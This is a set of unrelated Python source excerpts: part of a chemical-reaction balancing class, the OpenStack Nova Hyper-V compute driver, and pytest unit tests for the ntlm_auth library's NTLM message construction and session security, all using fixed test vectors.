            return compound_id
        else:
            return "%g %s" % (coeff, compound_id)

    def write_formula(self):
        """String representation."""
        left = []
        right = []
        for kegg_id in self.kegg_ids():
            coeff = self.get_coeff(kegg_id)
            if coeff < 0:
                left.append(Reaction.write_compound_and_coeff(kegg_id, -coeff))
            elif coeff > 0:
                right.append(Reaction.write_compound_and_coeff(kegg_id, coeff))
        return "%s %s %s" % (' + '.join(left), '=', ' + '.join(right))

    def _get_element_matrix(self):
        """Return (sorted element list, compounds-by-elements matrix); rows of
        compounds with unknown formulas are filled with NaN."""
        # gather the "atom bags" of all compounds in a list 'atom_bag_list'
        elements = set()
        atom_bag_list = []
        for kegg_id in self.kegg_ids():
            comp = self.get_compound(kegg_id)
            atom_bag = comp.get_atom_bag()
            if atom_bag is not None:
                elements = elements.union(atom_bag.keys())
            atom_bag_list.append(atom_bag)
        elements = sorted(elements)

        # create the elemental matrix, where each row is a compound and each
        # column is an element (or e-)
        Ematrix = matrix(zeros((len(atom_bag_list), len(elements))))
        for i, atom_bag in enumerate(atom_bag_list):
            if atom_bag is None:
                Ematrix[i, :] = nan
            else:
                for j, elem in enumerate(elements):
                    Ematrix[i, j] = atom_bag.get(elem, 0)
        return elements, Ematrix

    def _get_reaction_atom_balance(self):
        """Return a dict of element -> net imbalance (nonzero entries only)."""
        cids = list(self.kegg_ids())
        coeffs = matrix(list(map(self.get_coeff, cids)))

        elements, Ematrix = self._get_element_matrix()
        conserved = coeffs * Ematrix
        conserved = conserved.round(3)

        atom_balance_dict = dict([(e, c) for (e, c) in
                                  zip(elements, conserved.flat) if (c != 0)])
        return atom_balance_dict

    def check_half_reaction_balancing(self):
        """
        Returns:
            The number of electrons that are 'missing' in the half-reaction
            or None if the reaction is not atomwise-balanced.
        """
        atom_balance_dict = self._get_reaction_atom_balance()
        n_e = atom_balance_dict.pop('e-', 0)
        if not self._check_balancing(atom_balance_dict):
            return None
        else:
            return n_e

    def check_full_reaction_balancing(self):
        """
        Returns:
            True iff the reaction is balanced for all elements
            (excluding H)
        """
        atom_balance_dict = self._get_reaction_atom_balance()
        return self._check_balancing(atom_balance_dict)

    def _check_balancing(self, atom_balance_dict):
        """
        Use for checking if all elements are conserved.
        Args:
            atom_balance_dict - element -> net imbalance mapping
        Returns:
            True iff the reaction is elementally balanced; otherwise logs a
            warning per unbalanced element and returns False.
        Raises:
            ValueError if any compound formula is unknown (NaN imbalance).
        """
        # BUGFIX: the original used `nan in atom_balance_dict.values()`, which
        # never matches because the NaNs here are fresh numpy float objects and
        # NaN compares unequal to everything (including itself).
        if any(isnan(c) for c in atom_balance_dict.values()):
            warning_str = 'cannot test reaction balancing because of ' + \
                          'unspecific compound formulas: %s' % \
                          self.write_formula()
            raise ValueError(warning_str)

        # if there are unbalanced elements, write a full report
        if len(atom_balance_dict) == 0:
            return True
        logging.warning('unbalanced reaction: %s' % self.write_formula())
        for elem, c in atom_balance_dict.items():
            if c != 0:
                logging.warning('there are %d more %s atoms on the '
                                'right-hand side' % (c, elem))
        return False
| |
# Copyright (c) 2010 Cloud.com, Inc
# Copyright (c) 2012 Cloudbase Solutions Srl
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
A Hyper-V Nova Compute driver.
"""
import platform
from nova.i18n import _
from nova.openstack.common import log as logging
from nova.virt import driver
from nova.virt.hyperv import hostops
from nova.virt.hyperv import livemigrationops
from nova.virt.hyperv import migrationops
from nova.virt.hyperv import rdpconsoleops
from nova.virt.hyperv import snapshotops
from nova.virt.hyperv import vmops
from nova.virt.hyperv import volumeops
LOG = logging.getLogger(__name__)
class HyperVDriver(driver.ComputeDriver):
    """Nova compute driver for Microsoft Hyper-V.

    A thin facade: every driver method delegates to one of the
    operation helper objects (``*Ops``) created in ``__init__``.
    """
    def __init__(self, virtapi):
        super(HyperVDriver, self).__init__(virtapi)
        # One helper object per functional area; the methods below are
        # thin wrappers that dispatch to these.
        self._hostops = hostops.HostOps()
        self._volumeops = volumeops.VolumeOps()
        self._vmops = vmops.VMOps()
        self._snapshotops = snapshotops.SnapshotOps()
        self._livemigrationops = livemigrationops.LiveMigrationOps()
        self._migrationops = migrationops.MigrationOps()
        self._rdpconsoleops = rdpconsoleops.RDPConsoleOps()
    def init_host(self, host):
        """Driver start-up hook: restart the VM log writers."""
        self._vmops.restart_vm_log_writers()
    def list_instance_uuids(self):
        """Return the UUIDs of the instances known to the hypervisor."""
        return self._vmops.list_instance_uuids()
    def list_instances(self):
        """Return the names of the instances known to the hypervisor."""
        return self._vmops.list_instances()
    def spawn(self, context, instance, image_meta, injected_files,
              admin_password, network_info=None, block_device_info=None,
              flavor=None):
        """Create and boot a new instance.

        NOTE(review): ``flavor`` is accepted but not forwarded to VMOps.
        """
        self._vmops.spawn(context, instance, image_meta, injected_files,
                          admin_password, network_info, block_device_info)
    def reboot(self, context, instance, network_info, reboot_type,
               block_device_info=None, bad_volumes_callback=None):
        """Reboot an instance.

        ``context``, ``block_device_info`` and ``bad_volumes_callback``
        are ignored by this driver.
        """
        self._vmops.reboot(instance, network_info, reboot_type)
    def destroy(self, context, instance, network_info, block_device_info=None,
                destroy_disks=True, migrate_data=None):
        """Destroy an instance, optionally deleting its disks."""
        self._vmops.destroy(instance, network_info, block_device_info,
                            destroy_disks)
    def cleanup(self, context, instance, network_info, block_device_info=None,
                destroy_disks=True, migrate_data=None, destroy_vifs=True):
        """Cleanup after instance being destroyed by Hypervisor."""
        # Intentionally a no-op for this driver.
        pass
    def get_info(self, instance):
        """Return status information for an instance."""
        return self._vmops.get_info(instance)
    def attach_volume(self, context, connection_info, instance, mountpoint,
                      disk_bus=None, device_type=None, encryption=None):
        """Attach a volume to an instance.

        NOTE(review): only ``connection_info`` and the instance name are
        used; mountpoint, disk_bus, device_type and encryption are
        ignored by this driver.
        """
        return self._volumeops.attach_volume(connection_info,
                                             instance['name'])
    def detach_volume(self, connection_info, instance, mountpoint,
                      encryption=None):
        """Detach a volume (``mountpoint``/``encryption`` are ignored)."""
        return self._volumeops.detach_volume(connection_info,
                                             instance['name'])
    def get_volume_connector(self, instance):
        """Return the connector information used to attach volumes."""
        return self._volumeops.get_volume_connector(instance)
    def get_available_resource(self, nodename):
        """Report this host's available resources (``nodename`` ignored)."""
        return self._hostops.get_available_resource()
    def get_available_nodes(self, refresh=False):
        """A Hyper-V driver manages exactly one node: this machine."""
        return [platform.node()]
    def host_power_action(self, action):
        """Execute a power action on the host."""
        return self._hostops.host_power_action(action)
    def snapshot(self, context, instance, image_id, update_task_state):
        """Create a snapshot of an instance as image ``image_id``."""
        self._snapshotops.snapshot(context, instance, image_id,
                                   update_task_state)
    def pause(self, instance):
        """Pause an instance."""
        self._vmops.pause(instance)
    def unpause(self, instance):
        """Unpause a paused instance."""
        self._vmops.unpause(instance)
    def suspend(self, context, instance):
        """Suspend an instance."""
        self._vmops.suspend(instance)
    def resume(self, context, instance, network_info, block_device_info=None):
        """Resume a suspended instance (only ``instance`` is used)."""
        self._vmops.resume(instance)
    def power_off(self, instance, timeout=0, retry_interval=0):
        """Power off an instance."""
        self._vmops.power_off(instance, timeout, retry_interval)
    def power_on(self, context, instance, network_info,
                 block_device_info=None):
        """Power on an instance."""
        self._vmops.power_on(instance, block_device_info)
    def resume_state_on_host_boot(self, context, instance, network_info,
                                  block_device_info=None):
        """Resume guest state when a host is booted."""
        self._vmops.resume_state_on_host_boot(context, instance, network_info,
                                              block_device_info)
    def live_migration(self, context, instance, dest, post_method,
                       recover_method, block_migration=False,
                       migrate_data=None):
        """Live-migrate an instance to host ``dest``."""
        self._livemigrationops.live_migration(context, instance, dest,
                                              post_method, recover_method,
                                              block_migration, migrate_data)
    def rollback_live_migration_at_destination(self, context, instance,
                                               network_info,
                                               block_device_info,
                                               destroy_disks=True,
                                               migrate_data=None):
        """Clean up the destination after a failed live migration.

        NOTE(review): delegates to ``destroy`` without forwarding
        ``destroy_disks``/``migrate_data``.
        """
        self.destroy(context, instance, network_info, block_device_info)
    def pre_live_migration(self, context, instance, block_device_info,
                           network_info, disk_info, migrate_data=None):
        """Prepare the destination host before a live migration.

        ``disk_info`` and ``migrate_data`` are ignored by this driver.
        """
        self._livemigrationops.pre_live_migration(context, instance,
                                                  block_device_info,
                                                  network_info)
    def post_live_migration(self, context, instance, block_device_info,
                            migrate_data=None):
        """Source-side cleanup once a live migration completes."""
        self._livemigrationops.post_live_migration(context, instance,
                                                   block_device_info)
    def post_live_migration_at_destination(self, context, instance,
                                           network_info,
                                           block_migration=False,
                                           block_device_info=None):
        """Destination-side follow-up once a live migration completes."""
        self._livemigrationops.post_live_migration_at_destination(
            context,
            instance,
            network_info,
            block_migration)
    def check_can_live_migrate_destination(self, context, instance,
                                           src_compute_info, dst_compute_info,
                                           block_migration=False,
                                           disk_over_commit=False):
        """Validate on the destination that a live migration can proceed."""
        return self._livemigrationops.check_can_live_migrate_destination(
            context, instance, src_compute_info, dst_compute_info,
            block_migration, disk_over_commit)
    def check_can_live_migrate_destination_cleanup(self, context,
                                                   dest_check_data):
        """Release resources allocated by the destination check."""
        self._livemigrationops.check_can_live_migrate_destination_cleanup(
            context, dest_check_data)
    def check_can_live_migrate_source(self, context, instance,
                                      dest_check_data, block_device_info=None):
        """Validate on the source that a live migration can proceed."""
        return self._livemigrationops.check_can_live_migrate_source(
            context, instance, dest_check_data)
    def get_instance_disk_info(self, instance, block_device_info=None):
        """Not implemented for Hyper-V; implicitly returns None."""
        pass
    def plug_vifs(self, instance, network_info):
        """Plug VIFs into networks."""
        msg = _("VIF plugging is not supported by the Hyper-V driver.")
        raise NotImplementedError(msg)
    def unplug_vifs(self, instance, network_info):
        """Unplug VIFs from networks."""
        msg = _("VIF unplugging is not supported by the Hyper-V driver.")
        raise NotImplementedError(msg)
    def ensure_filtering_rules_for_instance(self, instance, network_info):
        # Intentionally only logs: no firewall filtering here.
        LOG.debug("ensure_filtering_rules_for_instance called",
                  instance=instance)
    def unfilter_instance(self, instance, network_info):
        # Intentionally only logs: no firewall filtering here.
        LOG.debug("unfilter_instance called", instance=instance)
    def migrate_disk_and_power_off(self, context, instance, dest,
                                   flavor, network_info,
                                   block_device_info=None,
                                   timeout=0, retry_interval=0):
        """First phase of a cold migration/resize: move disks, stop VM."""
        return self._migrationops.migrate_disk_and_power_off(context,
                                                             instance, dest,
                                                             flavor,
                                                             network_info,
                                                             block_device_info,
                                                             timeout,
                                                             retry_interval)
    def confirm_migration(self, migration, instance, network_info):
        """Confirm a completed migration/resize."""
        self._migrationops.confirm_migration(migration, instance, network_info)
    def finish_revert_migration(self, context, instance, network_info,
                                block_device_info=None, power_on=True):
        """Undo a migration/resize on the source host."""
        self._migrationops.finish_revert_migration(context, instance,
                                                   network_info,
                                                   block_device_info, power_on)
    def finish_migration(self, context, migration, instance, disk_info,
                         network_info, image_meta, resize_instance,
                         block_device_info=None, power_on=True):
        """Complete a migration/resize on the destination host."""
        self._migrationops.finish_migration(context, migration, instance,
                                            disk_info, network_info,
                                            image_meta, resize_instance,
                                            block_device_info, power_on)
    def get_host_ip_addr(self):
        """Return the IP address of this host."""
        return self._hostops.get_host_ip_addr()
    def get_host_uptime(self):
        """Return the uptime of this host."""
        return self._hostops.get_host_uptime()
    def get_rdp_console(self, context, instance):
        """Return RDP console connection details for an instance."""
        return self._rdpconsoleops.get_rdp_console(instance)
    def get_console_output(self, context, instance):
        """Return the serial console output of an instance."""
        return self._vmops.get_console_output(instance)
| |
import base64
import hashlib
import os
import requests
import sys
import warnings
import pytest
from requests.auth import AuthBase
from ntlm_auth.constants import NegotiateFlags
from ntlm_auth.exceptions import NoAuthContextError
from ntlm_auth.gss_channel_bindings import GssChannelBindingsStruct
from ntlm_auth.ntlm import Ntlm, NtlmContext
from ntlm_auth.session_security import SessionSecurity
# Baseline NTLM negotiate flags shared by every compatibility level in
# these tests; individual levels add NTLM/LM-key or extended session
# security on top of this set.
default_negotiate_flags = NegotiateFlags.NTLMSSP_NEGOTIATE_TARGET_INFO | \
                          NegotiateFlags.NTLMSSP_NEGOTIATE_128 | \
                          NegotiateFlags.NTLMSSP_NEGOTIATE_56 | \
                          NegotiateFlags.NTLMSSP_NEGOTIATE_UNICODE | \
                          NegotiateFlags.NTLMSSP_NEGOTIATE_VERSION | \
                          NegotiateFlags.NTLMSSP_NEGOTIATE_KEY_EXCH | \
                          NegotiateFlags.NTLMSSP_NEGOTIATE_ALWAYS_SIGN | \
                          NegotiateFlags.NTLMSSP_NEGOTIATE_SIGN | \
                          NegotiateFlags.NTLMSSP_NEGOTIATE_SEAL
class TestInitialiseNtlm(object):
    """Checks the flags/compatibility chosen by Ntlm() per level."""

    def _check_context(self, ntlm_context, expected_flags,
                       expected_ntlm_compatibility):
        # Shared assertion helper (the underscore prefix keeps pytest
        # from collecting it as a test).
        assert ntlm_context.negotiate_flags == expected_flags
        assert ntlm_context.ntlm_compatibility == expected_ntlm_compatibility

    def _check_extended_session_security(self, level):
        # Levels 2-5 all add extended session security on top of the
        # default flag set.
        flags = default_negotiate_flags | \
            NegotiateFlags.NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY
        self._check_context(Ntlm(ntlm_compatibility=level), flags, level)

    def _check_invalid_level(self, level):
        with pytest.raises(Exception) as exc:
            Ntlm(ntlm_compatibility=level)
        assert str(exc.value) == "Unknown ntlm_compatibility level - " \
                                 "expecting value between 0 and 5"

    def test_initialise_defaults(self):
        # The default compatibility level is 3.
        flags = default_negotiate_flags | \
            NegotiateFlags.NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY
        self._check_context(Ntlm(), flags, 3)

    def test_initialise_with_ntlm0(self):
        flags = default_negotiate_flags | \
            NegotiateFlags.NTLMSSP_NEGOTIATE_NTLM | \
            NegotiateFlags.NTLMSSP_NEGOTIATE_LM_KEY
        self._check_context(Ntlm(ntlm_compatibility=0), flags, 0)

    def test_initialise_with_ntlm1(self):
        flags = default_negotiate_flags | \
            NegotiateFlags.NTLMSSP_NEGOTIATE_NTLM | \
            NegotiateFlags.NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY
        self._check_context(Ntlm(ntlm_compatibility=1), flags, 1)

    def test_initialise_with_ntlm2(self):
        self._check_extended_session_security(2)

    def test_initialise_with_ntlm3(self):
        self._check_extended_session_security(3)

    def test_initialise_with_ntlm4(self):
        self._check_extended_session_security(4)

    def test_initialise_with_ntlm5(self):
        self._check_extended_session_security(5)

    def test_initialise_with_illegal_ntlm_compatibility_high(self):
        self._check_invalid_level(6)

    def test_initialise_with_illegal_ntlm_compatibility_low(self):
        self._check_invalid_level(-1)
class TestMessages(object):
    # Contains only lightweight tests, the actual message tests and its
    # permutations are in test_message.py
    def test_create_negotiate_message(self):
        """NEGOTIATE message for fixed inputs is byte-for-byte stable."""
        ntlm_context = Ntlm()
        # Base64 of the NEGOTIATE message for domain "Domain" and
        # workstation "COMPUTER" with the default flags.
        expected = b'TlRMTVNTUAABAAAAMbCI4gYABgAoAAAACAAIAC4AAAAGAbEdAAAAD0RvbWFpbkNPTVBVVEVS'
        actual = ntlm_context.create_negotiate_message("Domain", "COMPUTER")
        assert actual == expected
    def test_create_authenticate_message(self, monkeypatch):
        """Full handshake where the server negotiates sealing; session
        security must be created after authentication."""
        # Pin all nondeterministic inputs (client challenge, OS version,
        # exported session key, timestamp) to fixed values so the
        # AUTHENTICATE message can be compared against a fixed blob.
        monkeypatch.setattr('os.urandom', lambda s: b"\xaa" * 8)
        monkeypatch.setattr('ntlm_auth.messages.get_version',
                            lambda s: b"\x05\x01\x28\x0A\x00\x00\x00\x0F")
        monkeypatch.setattr('ntlm_auth.messages.get_random_export_session_key',
                            lambda: b"\x55" * 16)
        monkeypatch.setattr('ntlm_auth.compute_response.get_windows_timestamp',
                            lambda: b"\x00" * 8)
        # Canned server CHALLENGE message (base64, as sent over HTTP).
        test_challenge_string = base64.b64encode(
            b"\x4e\x54\x4c\x4d\x53\x53\x50\x00"
            b"\x02\x00\x00\x00\x2f\x82\x88\xe2"
            b"\x38\x00\x00\x00\x33\x82\x8a\xe2"
            b"\x01\x23\x45\x67\x89\xab\xcd\xef"
            b"\x00\x00\x00\x00\x00\x00\x00\x00"
            b"\x24\x00\x24\x00\x44\x00\x00\x00"
            b"\x06\x00\x70\x17\x00\x00\x00\x0f"
            b"\x53\x00\x65\x00\x72\x00\x76\x00"
            b"\x65\x00\x72\x00\x02\x00\x0c\x00"
            b"\x44\x00\x6f\x00\x6d\x00\x61\x00"
            b"\x69\x00\x6e\x00\x01\x00\x0c\x00"
            b"\x53\x00\x65\x00\x72\x00\x76\x00"
            b"\x65\x00\x72\x00\x00\x00\x00\x00"
        )
        test_ntlm_context = Ntlm()
        test_ntlm_context.create_negotiate_message("Domain", "COMPUTER")
        test_ntlm_context.parse_challenge_message(test_challenge_string)
        # Expected AUTHENTICATE message (base64) for User/Password.
        expected_message = base64.b64encode(
            b"\x4e\x54\x4c\x4d\x53\x53\x50\x00"
            b"\x03\x00\x00\x00\x18\x00\x18\x00"
            b"\x6c\x00\x00\x00\x54\x00\x54\x00"
            b"\x84\x00\x00\x00\x0c\x00\x0c\x00"
            b"\x48\x00\x00\x00\x08\x00\x08\x00"
            b"\x54\x00\x00\x00\x10\x00\x10\x00"
            b"\x5c\x00\x00\x00\x10\x00\x10\x00"
            b"\xd8\x00\x00\x00\x31\x82\x8a\xe2"
            b"\x05\x01\x28\x0a\x00\x00\x00\x0f"
            b"\x44\x00\x6f\x00\x6d\x00\x61\x00"
            b"\x69\x00\x6e\x00\x55\x00\x73\x00"
            b"\x65\x00\x72\x00\x43\x00\x4f\x00"
            b"\x4d\x00\x50\x00\x55\x00\x54\x00"
            b"\x45\x00\x52\x00\x86\xc3\x50\x97"
            b"\xac\x9c\xec\x10\x25\x54\x76\x4a"
            b"\x57\xcc\xcc\x19\xaa\xaa\xaa\xaa"
            b"\xaa\xaa\xaa\xaa\x68\xcd\x0a\xb8"
            b"\x51\xe5\x1c\x96\xaa\xbc\x92\x7b"
            b"\xeb\xef\x6a\x1c\x01\x01\x00\x00"
            b"\x00\x00\x00\x00\x00\x00\x00\x00"
            b"\x00\x00\x00\x00\xaa\xaa\xaa\xaa"
            b"\xaa\xaa\xaa\xaa\x00\x00\x00\x00"
            b"\x02\x00\x0c\x00\x44\x00\x6f\x00"
            b"\x6d\x00\x61\x00\x69\x00\x6e\x00"
            b"\x01\x00\x0c\x00\x53\x00\x65\x00"
            b"\x72\x00\x76\x00\x65\x00\x72\x00"
            b"\x00\x00\x00\x00\x00\x00\x00\x00"
            b"\xc5\xda\xd2\x54\x4f\xc9\x79\x90"
            b"\x94\xce\x1c\xe9\x0b\xc9\xd0\x3e"
        )
        actual_message = \
            test_ntlm_context.create_authenticate_message("User", "Password",
                                                          "Domain", "COMPUTER")
        actual_session_security = test_ntlm_context.session_security
        assert actual_message == expected_message
        # Sealing was negotiated, so session security must be set up.
        assert actual_session_security is not None
    def test_create_authenticate_message_without_security(self, monkeypatch):
        """Handshake where the server does not negotiate seal/sign: no
        session security is created, and the Ntlm facade's properties
        proxy through to the wrapped NtlmContext."""
        monkeypatch.setattr('os.urandom', lambda s: b"\xaa" * 8)
        monkeypatch.setattr('ntlm_auth.messages.get_version',
                            lambda s: b"\x05\x01\x28\x0A\x00\x00\x00\x0F")
        monkeypatch.setattr('ntlm_auth.messages.get_random_export_session_key',
                            lambda: b"\x55" * 16)
        monkeypatch.setattr('ntlm_auth.compute_response.get_windows_timestamp',
                            lambda: b"\x00" * 8)
        # Same CHALLENGE as above but with the seal/sign flags cleared.
        test_challenge_string = base64.b64encode(
            b"\x4e\x54\x4c\x4d\x53\x53\x50\x00"
            b"\x02\x00\x00\x00\x03\x00\x0c\x00"
            b"\x38\x00\x00\x00\x03\x92\x8a\xe2"
            b"\x01\x23\x45\x67\x89\xab\xcd\xef"
            b"\x00\x00\x00\x00\x00\x00\x00\x00"
            b"\x24\x00\x24\x00\x44\x00\x00\x00"
            b"\x06\x00\x70\x17\x00\x00\x00\x0f"
            b"\x53\x00\x65\x00\x72\x00\x76\x00"
            b"\x65\x00\x72\x00\x02\x00\x0c\x00"
            b"\x44\x00\x6f\x00\x6d\x00\x61\x00"
            b"\x69\x00\x6e\x00\x01\x00\x0c\x00"
            b"\x53\x00\x65\x00\x72\x00\x76\x00"
            b"\x65\x00\x72\x00\x00\x00\x00\x00"
        )
        test_ntlm_context = Ntlm()
        test_ntlm_context.create_negotiate_message("Domain", "COMPUTER")
        test_ntlm_context.parse_challenge_message(test_challenge_string)
        expected_message = base64.b64encode(
            b"\x4e\x54\x4c\x4d\x53\x53\x50\x00"
            b"\x03\x00\x00\x00\x18\x00\x18\x00"
            b"\x6c\x00\x00\x00\x54\x00\x54\x00"
            b"\x84\x00\x00\x00\x0c\x00\x0c\x00"
            b"\x48\x00\x00\x00\x08\x00\x08\x00"
            b"\x54\x00\x00\x00\x10\x00\x10\x00"
            b"\x5c\x00\x00\x00\x10\x00\x10\x00"
            b"\xd8\x00\x00\x00\x01\x92\x8a\xe2"
            b"\x05\x01\x28\x0a\x00\x00\x00\x0f"
            b"\x44\x00\x6f\x00\x6d\x00\x61\x00"
            b"\x69\x00\x6e\x00\x55\x00\x73\x00"
            b"\x65\x00\x72\x00\x43\x00\x4f\x00"
            b"\x4d\x00\x50\x00\x55\x00\x54\x00"
            b"\x45\x00\x52\x00\x86\xc3\x50\x97"
            b"\xac\x9c\xec\x10\x25\x54\x76\x4a"
            b"\x57\xcc\xcc\x19\xaa\xaa\xaa\xaa"
            b"\xaa\xaa\xaa\xaa\x68\xcd\x0a\xb8"
            b"\x51\xe5\x1c\x96\xaa\xbc\x92\x7b"
            b"\xeb\xef\x6a\x1c\x01\x01\x00\x00"
            b"\x00\x00\x00\x00\x00\x00\x00\x00"
            b"\x00\x00\x00\x00\xaa\xaa\xaa\xaa"
            b"\xaa\xaa\xaa\xaa\x00\x00\x00\x00"
            b"\x02\x00\x0c\x00\x44\x00\x6f\x00"
            b"\x6d\x00\x61\x00\x69\x00\x6e\x00"
            b"\x01\x00\x0c\x00\x53\x00\x65\x00"
            b"\x72\x00\x76\x00\x65\x00\x72\x00"
            b"\x00\x00\x00\x00\x00\x00\x00\x00"
            b"\xc5\xda\xd2\x54\x4f\xc9\x79\x90"
            b"\x94\xce\x1c\xe9\x0b\xc9\xd0\x3e"
        )
        actual_message = \
            test_ntlm_context.create_authenticate_message("User", "Password",
                                                          "Domain", "COMPUTER")
        actual_session_security = test_ntlm_context.session_security
        assert actual_message == expected_message
        assert actual_session_security is None
        # now test the properties map to the correct NtlmContext ones
        assert test_ntlm_context.authenticate_message == \
            test_ntlm_context._context._authenticate_message
        test_ntlm_context.authenticate_message = b"1"
        assert test_ntlm_context._context._authenticate_message == b"1"
        assert test_ntlm_context.challenge_message == \
            test_ntlm_context._context._challenge_message
        test_ntlm_context.challenge_message = b"2"
        assert test_ntlm_context._context._challenge_message == b"2"
        assert test_ntlm_context.negotiate_flags == \
            test_ntlm_context._context.negotiate_flags
        test_ntlm_context.negotiate_flags = 1
        assert test_ntlm_context._context.negotiate_flags == 1
        assert test_ntlm_context.negotiate_message == \
            test_ntlm_context._context._negotiate_message
        test_ntlm_context.negotiate_message = b"3"
        assert test_ntlm_context._context._negotiate_message == b"3"
        assert test_ntlm_context.ntlm_compatibility == \
            test_ntlm_context._context.ntlm_compatibility
        test_ntlm_context.ntlm_compatibility = 2
        assert test_ntlm_context._context.ntlm_compatibility == 2
        assert test_ntlm_context.session_security == \
            test_ntlm_context._context._session_security
        test_ntlm_context.session_security = b"4"
        assert test_ntlm_context._context._session_security == b"4"
class TestNtlmContext(object):
    def test_ntlm_context(self, monkeypatch):
        """End-to-end exchange with channel binding data (no MIC)."""
        # Pin all nondeterministic inputs so every produced message is
        # byte-for-byte reproducible.
        monkeypatch.setattr('os.urandom', lambda s: b"\xaa" * 8)
        monkeypatch.setattr('ntlm_auth.messages.get_version',
                            lambda s: b"\x05\x01\x28\x0A\x00\x00\x00\x0F")
        monkeypatch.setattr('ntlm_auth.messages.get_random_export_session_key',
                            lambda: b"\x55" * 16)
        monkeypatch.setattr('ntlm_auth.compute_response.get_windows_timestamp',
                            lambda: b"\x00" * 8)
        # TLS certificate hash used to build the channel bindings.
        ch = 'E3CA49271E5089CC48CE82109F1324F41DBEDDC29A777410C738F7868C4FF405'
        cbt_data = GssChannelBindingsStruct()
        cbt_data[cbt_data.APPLICATION_DATA] = b"tls-server-end-point:" + \
                                              base64.b16decode(ch)
        ntlm_context = NtlmContext("User", "Password", "Domain", "COMPUTER",
                                   cbt_data=cbt_data)
        actual_nego = ntlm_context.step()
        expected_nego = b"\x4e\x54\x4c\x4d\x53\x53\x50\x00" \
                        b"\x01\x00\x00\x00\x31\xb0\x88\xe2" \
                        b"\x06\x00\x06\x00\x28\x00\x00\x00" \
                        b"\x08\x00\x08\x00\x2e\x00\x00\x00" \
                        b"\x05\x01\x28\x0a\x00\x00\x00\x0f" \
                        b"\x44\x6f\x6d\x61\x69\x6e\x43\x4f" \
                        b"\x4d\x50\x55\x54\x45\x52"
        assert actual_nego == expected_nego
        assert not ntlm_context.mic_present
        assert not ntlm_context.complete
        # Canned server CHALLENGE message (no timestamp AV pair).
        challenge_msg = b"\x4e\x54\x4c\x4d\x53\x53\x50\x00" \
                        b"\x02\x00\x00\x00\x2f\x82\x88\xe2" \
                        b"\x38\x00\x00\x00\x33\x82\x8a\xe2" \
                        b"\x01\x23\x45\x67\x89\xab\xcd\xef" \
                        b"\x00\x00\x00\x00\x00\x00\x00\x00" \
                        b"\x24\x00\x24\x00\x44\x00\x00\x00" \
                        b"\x06\x00\x70\x17\x00\x00\x00\x0f" \
                        b"\x53\x00\x65\x00\x72\x00\x76\x00" \
                        b"\x65\x00\x72\x00\x02\x00\x0c\x00" \
                        b"\x44\x00\x6f\x00\x6d\x00\x61\x00" \
                        b"\x69\x00\x6e\x00\x01\x00\x0c\x00" \
                        b"\x53\x00\x65\x00\x72\x00\x76\x00" \
                        b"\x65\x00\x72\x00\x00\x00\x00\x00"
        actual_auth = ntlm_context.step(challenge_msg)
        expected_auth = b'\x4e\x54\x4c\x4d\x53\x53\x50\x00' \
                        b'\x03\x00\x00\x00\x18\x00\x18\x00' \
                        b'\x6c\x00\x00\x00\x68\x00\x68\x00' \
                        b'\x84\x00\x00\x00\x0c\x00\x0c\x00' \
                        b'\x48\x00\x00\x00\x08\x00\x08\x00' \
                        b'\x54\x00\x00\x00\x10\x00\x10\x00' \
                        b'\x5c\x00\x00\x00\x10\x00\x10\x00' \
                        b'\xec\x00\x00\x00\x31\x82\x8a\xe2' \
                        b'\x05\x01\x28\x0a\x00\x00\x00\x0f' \
                        b'\x44\x00\x6f\x00\x6d\x00\x61\x00' \
                        b'\x69\x00\x6e\x00\x55\x00\x73\x00' \
                        b'\x65\x00\x72\x00\x43\x00\x4f\x00' \
                        b'\x4d\x00\x50\x00\x55\x00\x54\x00' \
                        b'\x45\x00\x52\x00\x86\xc3\x50\x97' \
                        b'\xac\x9c\xec\x10\x25\x54\x76\x4a' \
                        b'\x57\xcc\xcc\x19\xaa\xaa\xaa\xaa' \
                        b'\xaa\xaa\xaa\xaa\x04\x10\xc4\x7a' \
                        b'\xcf\x19\x97\x89\xde\x7f\x20\x11' \
                        b'\x95\x7a\xea\x50\x01\x01\x00\x00' \
                        b'\x00\x00\x00\x00\x00\x00\x00\x00' \
                        b'\x00\x00\x00\x00\xaa\xaa\xaa\xaa' \
                        b'\xaa\xaa\xaa\xaa\x00\x00\x00\x00' \
                        b'\x02\x00\x0c\x00\x44\x00\x6f\x00' \
                        b'\x6d\x00\x61\x00\x69\x00\x6e\x00' \
                        b'\x01\x00\x0c\x00\x53\x00\x65\x00' \
                        b'\x72\x00\x76\x00\x65\x00\x72\x00' \
                        b'\x0a\x00\x10\x00\x6e\xa1\x9d\xf0' \
                        b'\x66\xda\x46\x22\x05\x1f\x9c\x4f' \
                        b'\x92\xc6\xdf\x74\x00\x00\x00\x00' \
                        b'\x00\x00\x00\x00\xe5\x69\x95\x1d' \
                        b'\x15\xd4\x73\x5f\x49\xe1\x4c\xf9' \
                        b'\xa7\xd3\xe6\x72'
        assert actual_auth == expected_auth
        assert ntlm_context.complete
        assert not ntlm_context.mic_present
        request_msg = b"test req"
        response_msg = b"test res"
        # Wrap (seal) a client message and verify a server-side
        # SessionSecurity built from the same keys can unwrap it.
        actual_wrapped = ntlm_context.wrap(request_msg)
        expected_wrapped = b"\x01\x00\x00\x00\xbc\xe3\x23\xa1" \
                           b"\x72\x06\x23\x78\x00\x00\x00\x00" \
                           b"\x70\x80\x1e\x11\xfe\x6b\x3a\xad"
        assert actual_wrapped == expected_wrapped
        server_sec = SessionSecurity(
            ntlm_context._session_security.negotiate_flags,
            ntlm_context._session_security.exported_session_key, "server"
        )
        # The first 16 bytes of the wrapped blob are the signature.
        server_unwrap = server_sec.unwrap(actual_wrapped[16:],
                                          actual_wrapped[0:16])
        assert server_unwrap == request_msg
        response_wrapped = server_sec.wrap(response_msg)
        actual_unwrap = ntlm_context.unwrap(
            response_wrapped[1] + response_wrapped[0]
        )
        assert actual_unwrap == response_msg
    def test_ntlm_context_with_mic(self, monkeypatch):
        """Exchange where the CHALLENGE carries a timestamp AV pair, so
        the AUTHENTICATE message should include a MIC."""
